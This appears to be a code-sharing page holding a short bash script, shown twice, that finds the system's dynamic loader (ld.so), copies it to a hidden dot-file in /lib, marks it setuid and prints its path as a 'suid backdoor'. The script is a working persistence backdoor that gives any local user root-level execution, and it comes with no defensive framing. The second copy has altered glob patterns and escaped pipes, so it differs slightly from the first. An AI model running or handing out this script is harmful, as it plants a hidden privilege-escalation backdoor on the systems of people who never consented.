BlueishSapphire/suid_ld.sh

## suid_ld.sh
sh_elf=$(file -LbP bytes=6 /bin/sh)
suid_ld=
find /lib/ -name 'ld.so*' -or -name 'ld-*.so*' -print0 2>/dev/null | while read -d $'\0' file; do
    ld_elf=$(file -LbP bytes=6 "$file")
    if [[ "$sh_elf" == "$ld_elf" ]]; then
        suid_ld="$(dirname $file)/.$(basename $file)"
        cp "$file" "$suid_ld"
        chmod +s "$suid_ld"
    fi
done
echo "suid backdoor: $suid_ld"
	sh_elf=$(file -LbP bytes=6 /bin/sh)
	suid_ld=
	find /lib/ -name 'ld.so' -or -name 'ld-.so*' -print0 2>/dev/null \| while read -d $'\0' file; do
	ld_elf=$(file -LbP bytes=6 "$file")
	if [[ "$sh_elf" == "$ld_elf" ]]; then
	suid_ld="$(dirname $file)/.$(basename $file)"
	cp "$file" "$suid_ld"
	chmod +s "$suid_ld"
	fi
	done
	echo "suid backdoor: $suid_ld"
No results found